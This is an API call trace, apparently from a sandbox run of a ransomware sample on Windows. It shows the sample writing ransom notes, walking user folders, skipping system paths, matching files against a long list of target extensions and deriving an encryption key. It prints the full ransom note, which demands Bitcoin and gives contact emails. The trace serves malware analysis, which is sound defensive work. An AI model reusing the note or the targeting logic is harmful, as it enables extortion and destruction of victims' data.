	[0199.178] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0199.178] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Templates\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\templates\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0199.179] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0199.179] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0199.179] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0199.180] CloseHandle (hObject=0x380) returned 1
	[0199.180] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0199.180] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0199.180] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0199.181] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Templates\\HELP_DECRYPT_YOUR_FILES.HTML") returned 60
	[0199.181] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Templates\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\templates\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0199.181] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0199.181] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0199.187] CloseHandle (hObject=0x380) returned 1
	[0199.188] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0199.188] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0199.225] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.226] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0199.227] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0199.227] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Templates\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\templates\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0199.228] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0199.228] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0199.228] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0199.229] CloseHandle (hObject=0x380) returned 1
	[0199.229] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Templates\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\templates\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x4377acca, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4377acca, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4377acca, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff
	[0199.230] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0199.230] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb82ebf88, ftLastAccessTime.dwHighDateTime=0x1d976a2, ftLastWriteTime.dwLowDateTime=0xb82ebf88, ftLastWriteTime.dwHighDateTime=0x1d976a2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1
	[0199.230] lstrcmpW (lpString1="Videos", lpString2="..") returned 1
	[0199.230] lstrcmpW (lpString1="Videos", lpString2=".") returned 1
	[0199.231] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\RDhJ0CNFevzX" | out: lpString1="C:\\Users\\RDhJ0CNFevzX") returned="C:\\Users\\RDhJ0CNFevzX"
	[0199.231] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\") returned="C:\\Users\\RDhJ0CNFevzX\\"
	[0199.231] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\", lpString2="Videos" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos") returned="C:\\Users\\RDhJ0CNFevzX\\Videos"
	[0199.231] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos") returned="C:\\Users\\RDhJ0CNFevzX\\Videos"
	[0199.232] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\"
	[0199.232] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\"
	[0199.232] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\", lpString2="*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\*.*"
	[0199.232] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb82ebf88, ftLastAccessTime.dwHighDateTime=0x1d976a2, ftLastWriteTime.dwLowDateTime=0x891f52b2, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9830
	[0199.233] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\*.*") returned 32
	[0199.233] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0199.233] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\*.*", cchLength=0x20 | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\*.*") returned 0x20
	[0199.234] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.234] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\*.*", lpSrch="windows") returned 0x0
	[0199.234] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.235] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\*.*", lpSrch="boot") returned 0x0
	[0199.235] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.235] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\*.*", lpSrch="system volume information") returned 0x0
	[0199.235] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.257] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0199.259] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.259] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\*.*", lpSrch="temp") returned 0x0
	[0199.259] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.260] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\*.*", lpSrch="program files") returned 0x0
	[0199.260] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.260] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\*.*", lpSrch="program files (x86)") returned 0x0
	[0199.260] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.261] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\*.*", lpSrch="appdata") returned 0x0
	[0199.261] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.261] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\*.*", lpSrch="application data") returned 0x0
	[0199.263] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.263] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\*.*", lpSrch="winnt") returned 0x0
	[0199.263] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.263] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\*.*", lpSrch="tmp") returned 0x0
	[0199.263] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.264] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\*.*", lpSrch="cache") returned 0x0
	[0199.264] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.264] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\*.*", lpSrch="temporary internet files") returned 0x0
	[0199.265] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.265] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\*.*", lpSrch="webcache") returned 0x0
	[0199.265] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.266] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\*.*", lpSrch="inetcache") returned 0x0
	[0199.266] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.266] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\*.*", lpSrch="nvidia") returned 0x0
	[0199.266] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.267] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\*.*", lpSrch="packages") returned 0x0
	[0199.268] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.268] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\*.*", lpSrch="cookies") returned 0x0
	[0199.268] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.269] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\*.*", lpSrch="programdata") returned 0x0
	[0199.269] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb82ebf88, ftLastAccessTime.dwHighDateTime=0x1d976a2, ftLastWriteTime.dwLowDateTime=0x891f52b2, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0199.269] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0129f00, ftCreationTime.dwHighDateTime=0x1d96c13, ftLastAccessTime.dwLowDateTime=0x2a418dd0, ftLastAccessTime.dwHighDateTime=0x1d97211, ftLastWriteTime.dwLowDateTime=0x2a418dd0, ftLastWriteTime.dwHighDateTime=0x1d97211, nFileSizeHigh=0x0, nFileSizeLow=0x62ef, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5yNSWXxLgY9GvMDMWup.swf", cAlternateFileName="5YNSWX~1.SWF")) returned 1
	[0199.270] lstrcmpW (lpString1="5yNSWXxLgY9GvMDMWup.swf", lpString2="..") returned 1
	[0199.270] lstrcmpW (lpString1="5yNSWXxLgY9GvMDMWup.swf", lpString2=".") returned 1
	[0199.270] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\"
	[0199.270] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\", lpString2="5yNSWXxLgY9GvMDMWup.swf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\5yNSWXxLgY9GvMDMWup.swf") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\5yNSWXxLgY9GvMDMWup.swf"
	[0199.271] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\5yNSWXxLgY9GvMDMWup.swf") returned 52
	[0199.271] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0199.271] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\5yNSWXxLgY9GvMDMWup.swf", cchLength=0x34 | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\5ynswxxlgy9gvmdmwup.swf") returned 0x34
	[0199.271] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.272] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\5ynswxxlgy9gvmdmwup.swf", lpSrch="help_decrypt_your_files") returned 0x0
	[0199.272] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\videos\\5ynswxxlgy9gvmdmwup.swf" | out: lpString1="c:\\users\\rdhj0cnfevzx\\videos\\5ynswxxlgy9gvmdmwup.swf") returned="c:\\users\\rdhj0cnfevzx\\videos\\5ynswxxlgy9gvmdmwup.swf"
	[0199.272] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\videos\\5ynswxxlgy9gvmdmwup.swf") returned 52
	[0199.272] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0199.273] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.273] StrStrW (lpFirst=".swf", lpSrch=".") returned=".swf"
	[0199.274] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.274] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".swf") returned=".swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0199.275] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0199.275] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0199.275] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\5ynswxxlgy9gvmdmwup.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\5ynswxxlgy9gvmdmwup.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0199.281] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x62ef, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x62ef, lpOverlapped=0x0) returned 1
	[0199.342] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.342] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcae68) returned 1
	[0199.344] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.344] CryptCreateHash (in: hProv=0xfcae68, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0199.344] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.345] CryptHashData (hHash=0xfb9bf0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0199.345] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.350] CryptDeriveKey (in: hProv=0xfcae68, Algid=0x6610, hBaseData=0xfb9bf0, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb98f0) returned 1
